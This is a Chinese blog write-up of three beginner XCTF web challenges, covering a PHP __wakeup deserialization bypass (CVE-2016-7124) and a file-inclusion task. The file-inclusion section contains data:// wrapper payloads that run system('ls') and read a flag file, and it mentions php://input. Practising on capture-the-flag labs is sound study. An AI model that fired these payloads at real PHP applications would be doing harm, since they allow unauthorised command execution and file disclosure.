Web攻防世界引导模式

2024-08-25 162 0

unserial3

反序列化,绕过漏洞

wakeup一旦存在反序列化则代码停止执行,看到这个想到考察我们wakeup漏洞的

因此我们需要根据漏洞(CVE-2016-7124)使序列化字符串中表示对象属性个数的值大于真实的属性个数,以此跳过__wakeup 的执行,达到绕过的目的。

先序列化的到源代码的结果,再改变参数实现绕过

看源代码清楚这是个get传参,直接改写url即可

<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a = new xctf();
print(serialize($a));
?>

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

这个字符串的解释如下:

  • O表示这是一个对象。
  • 4是类名xctf的长度。
  • "xctf"是类的名称。
  • 接下来的1表示序列化的对象有一个属性。
  • {s:4:"flag";s:3:"111";}表示有一个名为flag的字符串属性,其值为'111'
    写的好的仅供参考

Web_php_include

文件包含题目解析

原因:对传入的page参数没有好好过滤导致可以写入危险的php代码以获取信息

看代码:代码作用:过滤掉php://(防止利用这个伪协议进行文件包含漏洞执行,但是对大小写不敏感所以还是可以利用)

data伪协议:

?page=data://text/plain,<?php system("ls")?>
?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>

php;伪协议

php://input,用于执行php代码,需要post请求提交数据。

warmup

考察php代码的读取能力

先直接看页面代码通过传参

然后看提示的目录文件访问即可


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论